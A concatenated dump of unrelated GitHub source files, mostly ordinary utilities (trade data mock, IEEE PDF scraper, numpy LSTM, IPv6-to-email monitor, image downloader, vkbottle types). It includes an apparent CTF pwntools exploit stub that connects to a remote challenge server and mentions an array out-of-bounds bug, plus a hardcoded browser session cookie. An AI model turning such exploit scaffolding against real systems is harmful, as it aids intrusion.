dates.append(random_date)\r\n\r\n return dates\r\n\r\n def gen_trades(self, start: str = None, end: str = None, assetClass: str = None,\r\n maxPrice: int = None, minPrice: int = None, tradeType: str = None, tradeId: int = None,\r\n trader: str = None, instrumentId=None, counterparty=None, instrumentName: str = None):\r\n \"\"\"\r\n Generate mock trade data.\r\n\r\n Args:\r\n start (str): The start date for generating trade data.\r\n end (str): The end date for generating trade data.\r\n assetClass (str): The asset class of the instrument traded (default: None).\r\n maxPrice (int): The maximum price of the trade (default: None).\r\n minPrice (int): The minimum price of the trade (default: None).\r\n tradeType (str): The type of the trade (default: None).\r\n tradeId (int): The unique ID of the trade (default: None).\r\n trader (str): The name of the trader (default: None).\r\n instrumentId: The ID of the instrument traded (default: None).\r\n counterparty: The counterparty the trade was executed with (default: None).\r\n instrumentName (str): The name of the instrument traded (default: None).\r\n\r\n Returns:\r\n Trade: A Trade object generated with the provided parameters.\r\n\r\n \"\"\"\r\n td = {\r\n \"buySellIndicator\": None,\r\n \"price\": None,\r\n \"quantity\": None\r\n }\r\n\r\n t = {\r\n \"assetClass\": None,\r\n \"counterparty\": None,\r\n \"instrumentId\": None,\r\n \"instrumentName\": None,\r\n \"tradeDateTime\": None,\r\n \"tradeDetails\": None,\r\n \"tradeId\": None,\r\n \"trader\": None\r\n }\r\n\r\n instruments = {\r\n \"AAPL\": \"Apple Inc.\",\r\n \"MSFT\": \"Microsoft Corporation\",\r\n \"AMZN\": \"Amazon.com, Inc.\",\r\n \"GOOGL\": \"Alphabet Inc. (Google)\",\r\n \"FB\": \"Facebook, Inc.\",\r\n \"NVDA\": \"NVIDIA Corporation\",\r\n \"TSLA\": \"Tesla, Inc.\",\r\n \"INTC\": \"Intel Corporation\",\r\n \"ADBE\": \"Adobe Inc.\",\r\n \"CRM\": \"Salesforce.com, Inc.\"\r\n }\r\n\r\n traders_name = [\r\n \"John Smith\",\r\n \"Emily Johnson\",\r\n \"Michael Williams\",\r\n \"Sophia Brown\",\r\n \"Daniel Davis\",\r\n \"Olivia Miller\",\r\n \"William Wilson\",\r\n \"Ava Taylor\",\r\n \"James Anderson\",\r\n \"Isabella Martinez\"\r\n ]\r\n\r\n td[\"buySellIndicator\"] = tradeType if tradeType else random.choice([\"BUY\", \"SELL\"])\r\n td[\"price\"] = random.randint(minPrice, maxPrice) if minPrice and maxPrice else random.randint(150, 2500)\r\n td[\"quantity\"] = random.randint(5, 100)\r\n td = TradeDetails(**td)\r\n\r\n t[\"assetClass\"] = assetClass if assetClass else random.choice([\"Bond\", \"Equity\", \"Fixed\"])\r\n t[\"counterparty\"] = counterparty if counterparty else None\r\n t[\"instrumentId\"] = instrumentId if instrumentId else random.choice(list(instruments.keys()))\r\n t[\"instrumentName\"] = instrumentName if instrumentName else instruments[t[\"instrumentId\"]] \\\r\n if t[\"instrumentId\"] in instruments.keys() else t[\"instrumentId\"]\r\n t[\"tradeDateTime\"] = self.get_random_dates(start, end)[0] if start and end else self.get_random_dates()[0]\r\n t[\"tradeDetails\"] = td\r\n t[\"tradeId\"] = tradeId if tradeId else random.randint(1000, 5000)\r\n t[\"trader\"] = trader if trader else random.choice(traders_name)\r\n\r\n return Trade(**t)\r\n","repo_name":"arnavandraskar/Trade-API","sub_path":"datagenerator.py","file_name":"datagenerator.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3758253874","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pyquery import PyQuery as pq\nimport yapbib.biblist as biblist\n\n\nclass IEEE(object):\n\n def __init__(self, id, it=None):\n self.id = id\n if not it is None:\n self.it = it\n\n @property\n def title(self):\n if not hasattr(self, 'it'):\n self.it = self._full_bibtex().get_items()[0]\n return self.it['title']\n\n @staticmethod\n def from_url(url):\n return IEEE(id=id_from_url(url))\n\n @staticmethod\n def from_bibtex_item(it):\n #try:\n #return IEEE(id=id_from_item(it), it=it)\n #except:\n #print(it['title'])\n #raise\n return IEEE(id=id_from_item(it), it=it)\n\n @staticmethod\n def from_bibtex(f):\n b = biblist.BibList()\n ret = b.import_bibtex(f)\n assert ret\n return [IEEE.from_bibtex_item(it) for it in b.get_items()]\n\n def export_bibtex(self, f):\n b = self._full_bibtex()\n b.export_bibtex(f)\n\n def download_pdf(self):\n TEMPLATE = 'http://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=%s'\n url = TEMPLATE % self.id\n content = urlread(url)\n url = pq(content)('frame').eq(1).attr('src')\n content = urlread(url)\n filename = escape(self.title) + '.pdf'\n import os\n if not os.path.exists(filename):\n with open(filename, 'wb') as f:\n f.write(content)\n\n\ndef escape(name):\n from gn import Gn\n gn = Gn()\n return gn(name)\n\n\nimport urllib2\nimport cookielib\ncookies = cookielib.LWPCookieJar()\nhandlers = [\n urllib2.HTTPHandler(),\n urllib2.HTTPSHandler(),\n urllib2.HTTPCookieProcessor(cookies)\n ]\nopener = urllib2.build_opener(*handlers)\n\n\ndef urlread(url):\n hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n req = urllib2.Request(url, headers=hdr)\n page = opener.open(req)\n return page.read()\n\n\ndef from_clipboard():\n import win32clipboard\n win32clipboard.OpenClipboard()\n data = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n return data\n\n\ndef get_params():\n import sys\n return sys.argv[1] if len(sys.argv) > 1 else from_clipboard()\n\n\ndef download_bibtex(arg):\n bib = IEEE.from_url(arg)\n bib.export_bibtex('out.bib')\n\n\ndef download_pdf(arg):\n import time\n import random\n bibs = IEEE.from_bibtex(arg)\n print('bibs loaded')\n for bib in bibs:\n for i in range(1):\n try:\n print(bib.title)\n bib.download_pdf()\n jump = 60 + random.randint(0, 30)\n print('sleep %d' % jump)\n time.sleep(jump)\n except:\n print('failed')\n else:\n print('done')\n break\n\n\ndef id_from_item(it):\n urls = it['url'].split()\n assert urls\n for url in urls:\n try:\n return id_from_url(url)\n except:\n pass\n assert False\n\n\ndef id_from_url(url):\n from urlparse import urlparse, parse_qs\n word = parse_qs(urlparse(url).query)['arnumber'][0]\n assert word\n return word\n\n\nif __name__ == '__main__':\n arg = get_params()\n if arg.endswith('.bib'):\n download_pdf(arg)\n else:\n download_bibtex(arg)\n","repo_name":"Answeror/pypaper","sub_path":"pypaper/ieee.py","file_name":"ieee.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"11446782346","text":"from pwn import *\ncontext.log_level='debug'\n\nurl = 'alpha.8059blank.ml'\nport = 3000\np = remote(url, port)\n\nbinary = './rps2'\nelf = context.binary = ELF(binary)\n\n'''\nlooks like we have all securities enabled which is fairly annoying\ncouldnt find the vuln until lucas told me it was array oob (havent looked at exploit script yet)\nnever actually done array oob exploit except in an assembly intro course\nhe also said you need to win 5 times so will try to understand how that works\nany BOF will only crash the program at return, which is all the way at the end of main (see source code)\nand the program restarts before that if you dont win more than 5 times\n'''\n\n\n# reminder that this exists\n# win = elf.sym.win\n\n\n\nrop = ROP(elf)\n","repo_name":"absurdtiger/pwn","sub_path":".archive/CCT/hACk22/RPS/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11385189347","text":"import numpy as np\r\n\r\n\r\nclass manualLSTM:\r\n def __init__(self, Wi, Ui, bi, Wc, Uc, bc, Wf, Uf, bf, Wo, Uo, bo, W_out, b_out):\r\n self.Wi = Wi\r\n self.Ui = Ui\r\n self.bi = bi\r\n self.Wc = Wc\r\n self.Uc = Uc\r\n self.bc = bc\r\n self.Wf = Wf\r\n self.Uf = Uf\r\n self.bf = bf\r\n self.Wo = Wo\r\n self.Uo = Uo\r\n self.bo = bo\r\n self.W_out = W_out\r\n self.b_out = b_out\r\n self.ht_1 = None\r\n self.Ct_1 = None\r\n\r\n def sigmoid(self, x):\r\n return 1.0 / (1.0 + np.exp(-x))\r\n\r\n def forward(self, x):\r\n n, hidden_size = x.shape[0], self.Wi.shape[1]\r\n ht_list = []\r\n\r\n if self.ht_1 is None:\r\n self.ht_1 = np.zeros(n * hidden_size).reshape(n, hidden_size)\r\n self.Ct_1 = np.zeros(n * hidden_size).reshape(n, hidden_size)\r\n\r\n for t in np.arange(x.shape[1]):\r\n xt = np.array(x[:, t, :])\r\n it = self.sigmoid(\r\n np.dot(xt, self.Wi) + np.dot(self.ht_1, self.Ui) + self.bi\r\n )\r\n Ct_tilda = np.tanh(\r\n np.dot(xt, self.Wc) + np.dot(self.ht_1, self.Uc) + self.bc\r\n )\r\n ft = self.sigmoid(\r\n np.dot(xt, self.Wf) + np.dot(self.ht_1, self.Uf) + self.bf\r\n )\r\n Ct = it * Ct_tilda + ft * self.Ct_1\r\n ot = self.sigmoid(\r\n np.dot(xt, self.Wo) + np.dot(self.ht_1, self.Uo) + self.bo\r\n )\r\n ht = ot * np.tanh(Ct)\r\n ht_list.append(ht)\r\n\r\n self.ht_1 = ht\r\n self.Ct_1 = Ct\r\n\r\n y = np.dot(ht, self.W_out) + self.b_out\r\n return y\r\n","repo_name":"mamoru-gunji/PICO_W_magic_wands","sub_path":"pywin/manualLSTM.py","file_name":"manualLSTM.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"18005058916","text":"# -*- coding:utf-8 -*-\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.cluster import MeanShift, estimate_bandwidth\nimport numpy as np\nfrom itertools import cycle ##python自带的迭代器模块\n\n\ninput_X = []\nstations_coordinate_file_path = 'sanfrancisco/dataset/flow_data/tmas2012_stations.coordinate'\nwith open(stations_coordinate_file_path) as f:\n for line in f:\n id_lat_lon = line.strip().split(' ')\n lat = float(id_lat_lon[-2])\n lon = float(id_lat_lon[-1])\n input_X.append([lat, lon])\n\nX = np.array(input_X)\n\nbandwidth = estimate_bandwidth(X, quantile=0.5)\n\nms = MeanShift(bandwidth=bandwidth, bin_seeding=True)\n\nms.fit(X)\n\nlabels = ms.labels_\nprint(labels)\n\ncluster_centers = ms.cluster_centers_\nprint('cluster_centers:', cluster_centers)\n##总共的标签分类\nlabels_unique = np.unique(labels)\n\nn_clusters_ = len(labels_unique)\nprint(\"number of estimated clusters : %d\" % n_clusters_)","repo_name":"Leo-Bright/OSMparser","sub_path":"station_clustering.py","file_name":"station_clustering.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36952496162","text":"import pandas as pd\n\ndata = pd.read_csv(\"HighD_1.csv\", header=0)\nname = ['Frame_ID', 'Vehicle_ID', 'x', 'y', 'v', 'a', 'preceding_ID', 'lane_ID']\ncontent = []\nmax_val = data.shape[0]\nindex = 0\n\nwhile index < max_val:\n cur_list = data.loc[index].values[:]\n right = index + 1\n if right >= max_val:\n break\n next_list = data.loc[right].values[:]\n while next_list[1] == cur_list[1]:\n right += 1\n if right >= max_val:\n break\n next_list = data.loc[right].values[:]\n if right - index > 80:\n period = data[index: right]\n period = period.values.tolist()\n content += period\n index = right\n\n\nprint(len(content))\noutput = pd.DataFrame(columns=name, data=content)\noutput.to_csv('HighD_1_1.csv', index=False)","repo_name":"Breeze-P/tcn_working_sapce","sub_path":"car_following/generalization/step2.py","file_name":"step2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"30623257033","text":"import csv\nimport sys\n\n\ndef parse_csv(filename):\n \"\"\"\n Takes a csv file filename, parses it and returns a list of dicts.\n :param filename:\n :return:\n \"\"\"\n with open(filename, newline='') as f:\n reader = csv.DictReader(f)\n data = []\n try:\n for row in reader:\n data.append(row)\n return data\n except csv.Error as e:\n sys.exit('file {}, line {}: {}'.format(filename, reader.line_num, e))","repo_name":"Streamweaver/dnd_playground","sub_path":"dnd_data/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14588675441","text":"import os\r\nimport re\r\nimport requests\r\nimport socket\r\nimport subprocess\r\nimport time\r\nimport email\r\nimport smtplib\r\nimport logging\r\nfrom email.header import Header\r\nfrom email.mime.text import MIMEText\r\nfrom html import unescape\r\nfrom email.header import decode_header\r\nimport poplib\r\n\r\nclass IPv6_monitor():\r\n def __init__(self):\r\n LOG_FORMAT = \"%(asctime)s.%(msecs)03d - %(levelname)s - %(message)s\"\r\n DATE_FORMAT = \"%Y/%m/%d %H:%M:%S\"\r\n logfilename = time.strftime(\"%Y-%m-%d %H-%M-%S\",time.localtime()) \r\n logging.basicConfig(filename=logfilename+'.log', level=logging.INFO, format=LOG_FORMAT, datefmt=DATE_FORMAT)\r\n self.email_account = 'xxxx@xx.com'\r\n self.password = 'xxxxxxxxxx'\r\n self.pop3_server = 'pop.xx.com'\r\n self.smtp_server = 'smtp.xx.com'\r\n try:\r\n with open(os.path.join(os.path.abspath('./'),'ipv6cache.txt'),'r') as a:\r\n ipv6_addresses = a.readlines()\r\n except: \r\n file = open(os.path.join(os.path.abspath('./'),'ipv6cache.txt','w'))\r\n file.close()\r\n\r\n def get_ipv6_address(self):\r\n ipv6_addresses = []\r\n addresses_info = socket.getaddrinfo(socket.gethostname(),None)\r\n for item in addresses_info:\r\n if ':' in item[4][0]:\r\n ipv6_addresses.append(item[4][0])\r\n ipv6_address = None\r\n for ip in ipv6_addresses:\r\n if ip.split(':')[0].find('240e') >= 0 or ip.split(':')[0].find('2400') >= 0 or ip.split(':')[0].find('2408') >= 0 or ip.split(':')[0].find('2001') >= 0:\r\n ipv6_address = ip\r\n break\r\n return ipv6_address\r\n\r\n def obtain_ipv6_address_from_email(self):\r\n # 连接到POP3服务器:\r\n server = poplib.POP3_SSL(self.pop3_server)\r\n # 可以打开或关闭调试信息:\r\n server.set_debuglevel(0)\r\n # 身份认证:\r\n server.user(self.email_account)\r\n server.pass_(self.password)\r\n\r\n resp, mails, octets = server.list()\r\n # 可以查看返回的列表类似[b'1 82923', b'2 2184', ...]\r\n email_titles=[] \r\n\r\n for i in range(len(mails)): \r\n message = b'\\n'.join(server.retr(i+1)[1])\r\n mail = email.message_from_bytes(message)\r\n subject = mail.get(\"Subject\")\r\n try:\r\n dh = decode_header(subject)\r\n if dh[0][1] == None:\r\n email_titles.append(dh[0][0])\r\n else:\r\n result = dh[0][0].decode(dh[0][1])\r\n email_titles.append(result)\r\n except:\r\n email_titles.append(str(decode_header(subject)[0][0]))\r\n continue\r\n\r\n newest_index = len(email_titles)\r\n for j in range(len(email_titles)):\r\n if email_titles[j].find('获得的ipv6地址') >= 0 :\r\n newest_index = j + 1\r\n newest_message = b'\\n'.join(server.retr(newest_index)[1])\r\n newest_mail = email.message_from_bytes(newest_message)\r\n server.quit()\r\n ipv6_pattern='(([a-f0-9]{1,4}:){0,7}[a-f0-9]{1,4})'\r\n m = re.search(ipv6_pattern, str(self.get_file(newest_mail)))\r\n try:\r\n if m is not None and len(m.group()) > 10:\r\n return m.group()\r\n else:\r\n ipv6_pattern='([a-f0-9:]*::[a-f0-9:]*)'\r\n m = re.search(ipv6_pattern, str(self.get_file(newest_mail)))\r\n return m.group()\r\n except:\r\n try:\r\n result = re.findall(r\"(([a-f0-9]{1,4}:){7}[a-f0-9]{1,4})\", str(self.get_file(newest_mail)), re.I)[0][0]\r\n return result\r\n except:\r\n print('出现错误')\r\n\r\n def get_file(self, msg):\r\n data_char=''\r\n for part in msg.walk():\r\n part_charset=part.get_content_charset()\r\n part_type=part.get_content_type()\r\n if part_type==\"text/plain\" or part_type=='text/html':\r\n data=part.get_payload(decode=True)\r\n try:\r\n data=data.decode(part_charset,errors=\"replace\")\r\n except:\r\n data=data.decode('gb2312',errors=\"replace\")\r\n data=self.html_to_plain_text(data)\r\n data_char=data_char+'\\n'+data\r\n return data_char+'\\n'\r\n\r\n def html_to_plain_text(self, html):\r\n text = re.sub('.*?', ' ', html, flags=re.M | re.S | re.I)\r\n text = re.sub(r'', ' HYPERLINK ', text, flags=re.M | re.S | re.I)\r\n text = re.sub('<.*?>', ' ', text, flags=re.M | re.S)\r\n text = re.sub(r'(\\s*\\n)+', '\\n', text, flags=re.M | re.S)\r\n return unescape(text)\r\n\r\n def send_ipv6_address_to_email(self,ipv6_address):\r\n msg = MIMEText(socket.gethostname()+'的IPV6地址为:'+ipv6_address, 'plain', 'utf-8') \r\n server = smtplib.SMTP(self.smtp_server, 25) # SMTP协议默认端口是25 \r\n server.login(self.email_account, self.password) # 登录SMTP服务器\r\n msg['From'] = self.email_account+' <'+self.email_account+'>'\r\n msg['Subject'] = Header(u'获得的ipv6地址', 'utf8').encode()\r\n msg['To'] = u'<'+self.email_account+'>'\r\n server.sendmail(self.email_account, [self.email_account], msg.as_string()) # 发邮件\r\n logging.info('IPV6地址:'+ipv6_address+'已发送')\r\n server.quit()\r\n\r\n def read_ipv6_address(self): \r\n path = os.path.join(os.path.abspath('./'),'ipv6cache.txt')\r\n with open(path,'r') as a:\r\n ipv6_addresses = a.readlines()\r\n if ipv6_addresses[-1][-1] == '\\n':\r\n ipv6_address = ipv6_addresses[-1][0:-1]\r\n elif ipv6_addresses[-1][-1] != '\\n':\r\n ipv6_address = ipv6_addresses[-1]\r\n return ipv6_address\r\n\r\n def read_ipv6_address_from_host(self): \r\n path = r'C:\\Windows\\System32\\drivers\\etc\\hosts'\r\n ipv6_addresses = []\r\n with open(path,'r', encoding=\"utf-8\") as a:\r\n hosts_strs = a.readlines()\r\n for hosts_str in hosts_strs:\r\n if hosts_str.find('www.xxxx.com') >= 0 :\r\n ipv6_addresses.append(hosts_str)\r\n return ipv6_addresses[-1].split()[0]\r\n\r\n def write_ipv6_address(self,ipv6_address):\r\n path = os.path.join(os.path.abspath('./'),'ipv6cache.txt')\r\n with open(path,'r') as a:\r\n ipv6_addresses = a.readlines()\r\n if ipv6_addresses[-1] == ipv6_address or ipv6_addresses[-1] == ipv6_address+'\\n':\r\n pass\r\n else:\r\n with open('ipv6cache.txt', 'a', encoding=\"utf-8\") as file_object:\r\n if ipv6_addresses[-1][-1] != '\\n':\r\n file_object.write('\\n'+ipv6_address)\r\n logging.info('IPV6地址:'+ipv6_address+'已缓存')\r\n elif ipv6_addresses[-1][-1] == '\\n':\r\n file_object.write(ipv6_address+'\\n')\r\n logging.info('IPV6地址:'+ipv6_address+'已缓存')\r\n\r\n def synchronize_ipv6_address(self):\r\n if self.current_ipv6_address != self.stored_ipv6_address or self.current_ipv6_address.find(self.stored_ipv6_address) < 0: \r\n self.write_ipv6_address(self.current_ipv6_address)\r\n self.stored_ipv6_address = self.read_ipv6_address()\r\n logging.info('已同步当前与缓存中存储的地址')\r\n if self.current_ipv6_address != self.email_ipv6_address or self.current_ipv6_address.find(self.email_ipv6_address) < 0:\r\n self.send_ipv6_address_to_email(self.current_ipv6_address)\r\n self.email_ipv6_address = self.obtain_ipv6_address_from_email()\r\n logging.info('已同步当前与邮件中存储的地址')\r\n\r\n def change_ipv6_address(self,ipv6_address):\r\n subprocess.Popen('echo '+ipv6_address+' www.xxxx.com >> %systemroot%\\system32\\drivers\\etc\\hosts',shell=True)\r\n\r\n def get_ipv6_address_from_web(self):\r\n try:\r\n ipv6_address = requests.get('https://v6.ident.me').text\r\n except:\r\n ipv6_address = None\r\n return ipv6_address\r\n\r\n def disconnect_WLAN(self):\r\n subprocess.Popen('netsh wlan disconnect')\r\n\r\n def disable_WLAN(self,interface):\r\n subprocess.Popen('netsh interface set interface \"'+interface+'\" disabled')\r\n\r\n def enable_WLAN(self,interface):\r\n subprocess.Popen('netsh interface set interface \"'+interface+'\" enabled') \r\n\r\n def connect_WLAN(self,wlan_name):\r\n logging.info('正在联网')\r\n subprocess.Popen('netsh wlan connect name='+wlan_name)\r\n\r\n def show_WLAN_interface(self):\r\n interface = subprocess.Popen('netsh wlan show interface').readlines()\r\n return interface[3][interface[3].find(':')+2:-1]\r\n\r\n def ip_monitor(self,wlan_name):\r\n # 初始化\r\n self.check_flag = 1\r\n logging.info('初始化开始') \r\n self.current_ipv6_address = self.get_ipv6_address()\r\n self.stored_ipv6_address = self.read_ipv6_address()\r\n self.email_ipv6_address = self.obtain_ipv6_address_from_email() \r\n if self.current_ipv6_address is not None:\r\n self.synchronize_ipv6_address('monitor')\r\n elif self.current_ipv6_address is None:\r\n while True:\r\n if self.current_ipv6_address is None:\r\n time.sleep(0.2)\r\n self.connect_WLAN(wlan_name)\r\n time.sleep(5)\r\n self.current_ipv6_address = self.get_ipv6_address()\r\n elif self.current_ipv6_address is not None:\r\n self.synchronize_ipv6_address('monitor')\r\n break\r\n logging.info('初始化完成')\r\n logging.info('开始监控')\r\n while True:\r\n self.current_ipv6_address = self.get_ipv6_address()\r\n # 检查联网\r\n if self.current_ipv6_address is None:\r\n while True:\r\n if self.current_ipv6_address is None: \r\n time.sleep(0.2)\r\n self.connect_WLAN(wlan_name)\r\n time.sleep(5)\r\n self.current_ipv6_address = self.get_ipv6_address()\r\n elif self.current_ipv6_address is not None:\r\n logging.info('联网成功')\r\n break\r\n # 检查ip变化 \r\n if self.current_ipv6_address is not None:\r\n self.synchronize_ipv6_address('monitor') \r\n if self.check_flag == 1:\r\n self.check_flag = 0\r\n try:\r\n self.get_ipv6_address_from_web()\r\n except:\r\n self.disconnect_WLAN()\r\n time.sleep(0.3)\r\n self.connect_WLAN(wlan_name)\r\n time.sleep(60)\r\n elif self.check_flag == 0:\r\n time.sleep(60)\r\n self.check_flag = 1 \r\n\r\nif __name__ == \"__main__\":\r\n IPv6_monitor().ip_monitor('wifi_name')","repo_name":"Morihaojie/ipv6monitor","sub_path":"ipv6monitor.py","file_name":"ipv6monitor.py","file_ext":"py","file_size_in_byte":11203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"27907389929","text":"import urllib,re,requests\nimport sys\nimport util\nimport json\nimport os\nfrom bs4 import BeautifulSoup\nheaders = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n 'Cookie':'MUID=0DA4D4BD498D6CFB3AA9D9BE4D8D6820; _SS=SID=00; videoCookiesLastCategory=en-ca=animals; _cb_ls=1; _cb=DsAPZCJmzJ0BiCB2c; _chartbeat2=.1550504320201.1550509083431.11.uAsG96ZMUeDgWcawC2JWWNCmna0Z.1; ANON=A=E43533FD3C93526D33F4F5C4FFFFFFFF&E=164d&W=1; NAP=V=1.9&E=15f3&C=gBm5NGQ6hq9_2JLke_9M_uUX-nhzUVJp3UwliRTchLXC4pE05Iv2DA&W=1; vidvol=10; adoptout={\"msaOptOut\":0,\"adIdOptOut\":0}; videoerrorcount=0; trg=0%7C0%7C0; ecasession=v2_9a22cfec7b49fc3893239e7b074a63fd_ba74fcd1-eff2-48d8-b6af-082423d58358-tuct35eea8e_1550666026_1550666984_CNawjgYQqLw-GP6e37rd9J7zBiACKAYwMDjK_QdA_qAQSI7OHlCJxAlYAGAC'\n}\n\ndef download(url, path):\n if (not os.path.exists(path)):\n urllib.request.urlretrieve(url, path)\n\ndef readFrom(path) :\n f = open(path, \"r\")\n text = f.readlines()\n f.close()\n return text\n\n# check folder existed or not, if not create it\ndef checkAndCreateFolder(folderName):\n if (not os.path.exists(folderName)):\n os.makedirs(folderName)\n\nif __name__ == \"__main__\":\n imgFile = r\"F:\\mayun\\Note\\Python\\Spider\\source\\img.txt\"\n images = readFrom(imgFile)\n i = 1\n j = 139\n for item in images:\n targetDir= r\"H:\\自媒体\\图片\\umei\"\n targetDir = os.path.join(targetDir, str(j))\n checkAndCreateFolder(targetDir)\n targetFile = os.path.join(targetDir, str(i)+'.jpg')\n download(item, targetFile)\n if i % 5 == 0:\n i = 0\n j = j +1\n i = i +1\n","repo_name":"Cary123/note","sub_path":"Python/Spider/downloadImg.py","file_name":"downloadImg.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"29233382454","text":"import typing\nimport enum\nfrom vkbottle_types.responses.base_response import BaseResponse, BaseModel\nfrom vkbottle_types.base_model import Field\n\nfrom vkbottle_types.objects import (\n PollsFriend,\n PollsPollAnonymous,\n BaseImage,\n PollsVotersFieldsUsers,\n UsersUserFull,\n BaseGradientPoint,\n PollsVotersUsers,\n PollsBackground,\n PollsAnswer,\n)\n\n\nclass PollsAnswerResponseModel(BaseModel):\n id: int = Field(\n description=\"Answer ID\",\n )\n\n rate: float = Field(\n description=\"Answer rate in percents\",\n )\n\n text: str = Field(\n description=\"Answer text\",\n )\n\n votes: int = Field(\n description=\"Votes number\",\n )\n\n\nclass PollsAnswerResponse(BaseResponse):\n response: \"PollsAnswerResponseModel\"\n\n\nclass PollsBackgroundResponseModel(BaseModel):\n angle: typing.Optional[int] = Field(\n default=None,\n description=\"Gradient angle with 0 on positive X axis\",\n )\n\n color: typing.Optional[str] = Field(\n default=None,\n description=\"Hex color code without #\",\n )\n\n height: typing.Optional[int] = Field(\n default=None,\n description=\"Original height of pattern tile\",\n )\n\n id: typing.Optional[int] = Field(\n default=None,\n )\n\n name: typing.Optional[str] = Field(\n default=None,\n )\n\n images: typing.Optional[typing.List[BaseImage]] = Field(\n default=None,\n description=\"Pattern tiles\",\n )\n\n points: typing.Optional[typing.List[BaseGradientPoint]] = Field(\n default=None,\n description=\"Gradient points\",\n )\n\n type: typing.Optional[typing.Literal[\"gradient\", \"tile\"]] = Field(\n default=None,\n )\n\n width: typing.Optional[int] = Field(\n default=None,\n description=\"Original with of pattern tile\",\n )\n\n\nclass PollsBackgroundResponse(BaseResponse):\n response: \"PollsBackgroundResponseModel\"\n\n\nclass PollsFieldsVotersResponseModel(BaseModel):\n answer_id: typing.Optional[int] = Field(\n default=None,\n description=\"Answer ID\",\n )\n\n users: typing.Optional[\"PollsVotersFieldsUsers\"] = Field(\n default=None,\n )\n\n answer_offset: typing.Optional[str] = Field(\n default=None,\n description=\"Answer offset\",\n )\n\n\nclass PollsFieldsVotersResponse(BaseResponse):\n response: \"PollsFieldsVotersResponseModel\"\n\n\nclass PollsFriendResponseModel(BaseModel):\n id: int = Field()\n\n\nclass PollsFriendResponse(BaseResponse):\n response: \"PollsFriendResponseModel\"\n\n\nclass PollsPollResponseModel(BaseModel):\n multiple: bool = Field(\n description=\"Information whether the poll with multiple choices\",\n )\n\n end_date: int = Field()\n\n closed: bool = Field()\n\n is_board: bool = Field()\n\n can_edit: bool = Field()\n\n can_vote: bool = Field()\n\n can_report: bool = Field()\n\n can_share: bool = Field()\n\n answers: typing.List[PollsAnswer] = Field()\n\n created: int = Field(\n description=\"Date when poll has been created in Unixtime\",\n )\n\n id: int = Field(\n description=\"Poll ID\",\n )\n\n owner_id: int = Field(\n description=\"Poll owner's ID\",\n )\n\n question: str = Field(\n description=\"Poll question\",\n )\n\n votes: int = Field(\n description=\"Votes number\",\n )\n\n disable_unvote: bool = Field()\n\n anonymous: typing.Optional[\"PollsPollAnonymous\"] = Field(\n default=None,\n )\n\n friends: typing.Optional[typing.List[PollsFriend]] = Field(\n default=None,\n )\n\n answer_id: typing.Optional[int] = Field(\n default=None,\n description=\"Current user's answer ID\",\n )\n\n answer_ids: typing.Optional[typing.List[int]] = Field(\n default=None,\n description=\"Current user's answer IDs\",\n )\n\n embed_hash: typing.Optional[str] = Field(\n default=None,\n )\n\n photo: typing.Optional[\"PollsBackground\"] = Field(\n default=None,\n )\n\n author_id: typing.Optional[int] = Field(\n default=None,\n description=\"Poll author's ID\",\n )\n\n background: typing.Optional[\"PollsBackground\"] = Field(\n default=None,\n )\n\n\nclass PollsPollResponse(BaseResponse):\n response: \"PollsPollResponseModel\"\n\n\nPollsPollAnonymousResponseModel = bool\n\n\nclass PollsPollAnonymousResponse(BaseResponse):\n response: \"PollsPollAnonymousResponseModel\"\n\n\nclass PollsVotersResponseModel(BaseModel):\n answer_id: typing.Optional[int] = Field(\n default=None,\n description=\"Answer ID\",\n )\n\n users: typing.Optional[\"PollsVotersUsers\"] = Field(\n default=None,\n )\n\n answer_offset: typing.Optional[str] = Field(\n default=None,\n description=\"Answer offset\",\n )\n\n\nclass PollsVotersResponse(BaseResponse):\n response: \"PollsVotersResponseModel\"\n\n\nclass PollsVotersFieldsUsersResponseModel(BaseModel):\n count: typing.Optional[int] = Field(\n default=None,\n description=\"Votes number\",\n )\n\n items: typing.Optional[typing.List[UsersUserFull]] = Field(\n default=None,\n )\n\n\nclass PollsVotersFieldsUsersResponse(BaseResponse):\n response: \"PollsVotersFieldsUsersResponseModel\"\n\n\nclass PollsVotersUsersResponseModel(BaseModel):\n count: typing.Optional[int] = Field(\n default=None,\n description=\"Votes number\",\n )\n\n items: typing.Optional[typing.List[int]] = Field(\n default=None,\n )\n\n\nclass PollsVotersUsersResponse(BaseResponse):\n response: 